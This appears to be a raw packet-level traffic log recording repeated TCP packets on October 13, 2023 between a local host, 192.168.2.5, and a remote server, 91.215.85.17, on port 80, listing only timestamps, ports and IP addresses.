Oct 13, 2023 15:20:50.583784103 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.583818913 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.583849907 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.583854914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.583890915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.583898067 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.583961010 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.584002972 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.584073067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.584111929 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.584155083 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.584229946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.584265947 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.584317923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.584335089 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.584376097 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.584414959 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.584445000 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.584482908 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.584531069 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.584549904 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.584618092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.584652901 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.584665060 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.584742069 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.584793091 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.584817886 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.584918976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.584968090 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.585016012 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.585052967 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.585099936 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.585120916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.585190058 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.585237026 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.585242987 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.585311890 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.585367918 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.585398912 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.585434914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.585470915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.585484028 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.585540056 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.585576057 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.585589886 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.585675001 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.585710049 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.585722923 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.585747957 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.585797071 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.585830927 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.585866928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.585901976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.585920095 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.585999966 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.586050034 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.586117029 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.586225986 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.586272001 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.935826063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.935889006 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.935925007 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.935965061 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.936002016 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.936036110 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.936038971 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.936036110 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.936077118 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.936104059 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.936198950 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.936239004 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.936264038 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.936275005 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.936315060 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.936330080 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.936362028 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.936398983 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.936412096 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.936438084 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.936475039 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.936486959 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.936609983 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.936661005 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.936677933 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.936747074 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.936810970 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.936844110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.936933041 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.936988115 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.937053919 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.937091112 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.937141895 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.937213898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.937283039 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.937329054 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.937350035 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.937417984 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.937453985 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.937465906 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.937599897 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.937637091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.937655926 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.937695026 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.937736988 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.937745094 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.937840939 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.937876940 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.937896013 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.937962055 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.937998056 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.938009977 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.938034058 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.938070059 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.938083887 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.938138008 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.938174009 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.938189030 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.938242912 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.938293934 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.938340902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.938406944 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.938467979 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.938469887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.938507080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.938560963 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.938616991 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.938653946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.938689947 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.938702106 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.938797951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.938842058 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.938848019 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.938901901 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.938952923 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.938971996 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.939038992 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.939090967 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.939152002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.939188957 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.939224958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.939239979 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.939260960 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.939311981 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.939328909 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.939364910 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.939414978 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.939431906 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.939467907 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.939515114 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.939541101 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.939579010 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.939641953 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.939678907 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.939843893 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.939884901 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.939898968 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.939941883 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.939979076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.939990997 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.940048933 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.940085888 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.940114975 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.940155029 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.940212965 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.940223932 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.940332890 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.940368891 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.940385103 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.940406084 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.940459967 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.940520048 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.940588951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.940627098 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.940643072 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.940696001 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.940740108 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.940756083 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.940807104 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.940857887 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.287699938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.287918091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.287955999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.287991047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.288028955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.288034916 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.288036108 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.288065910 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.288105011 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.288111925 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.288187981 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.288240910 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.288259983 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.288356066 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.288405895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.288418055 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.288500071 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.288536072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.288551092 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.288770914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.288830996 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.288877010 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.288913012 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.288969994 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.289017916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.289084911 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.289139986 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.289304018 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.289341927 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.289393902 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.289434910 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.289474010 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.289510965 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.289535046 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.289586067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.289640903 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.289654970 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.289824963 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.289892912 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.289918900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.289985895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.290043116 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.290076971 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.290148973 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.290205002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.290246010 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.290299892 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.290338039 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.290355921 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.290455103 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.290524960 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.290535927 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.290666103 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.290724993 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.290788889 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.290827036 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.290862083 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.290875912 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.290935040 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.290985107 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.291002035 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.291078091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.291115999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.291134119 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.291183949 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.291241884 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.291896105 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.312915087 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.312956095 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.664849997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.681612015 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.681965113 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.681981087 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.681997061 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.682014942 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.682029963 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.682054996 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.682070971 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.682079077 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.682166100 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.682244062 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.682244062 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.682244062 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.682257891 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.682306051 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.682336092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.682389975 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.682442904 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.682465076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.682506084 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.682559967 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.682583094 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.682619095 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.682671070 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.682687044 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.682754993 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.682790995 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.682811022 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.682882071 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.682919025 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.682934046 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.683027029 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.683080912 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.683125019 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.683233023 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.683269024 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.683283091 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.683372974 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.683425903 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.683444977 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.683482885 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.683531046 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.683551073 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.683667898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.683717966 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.683753014 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.683830976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.683881044 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.683893919 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.683980942 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.684027910 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.684073925 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.684111118 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.684160948 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.684185028 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.684267044 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.684303045 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.684314966 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.684339046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.684375048 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.684393883 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.684442997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.684495926 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.684511900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.684602022 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.684650898 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.684685946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.684753895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.684806108 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.684896946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.684974909 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.685023069 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.685059071 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.685127020 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.685175896 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.685209036 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.685296059 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.685345888 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.685372114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.685415030 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.685467005 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.685482979 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.685518026 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.685564995 CEST	49721	80	192.168.2.5	91.215.85.17
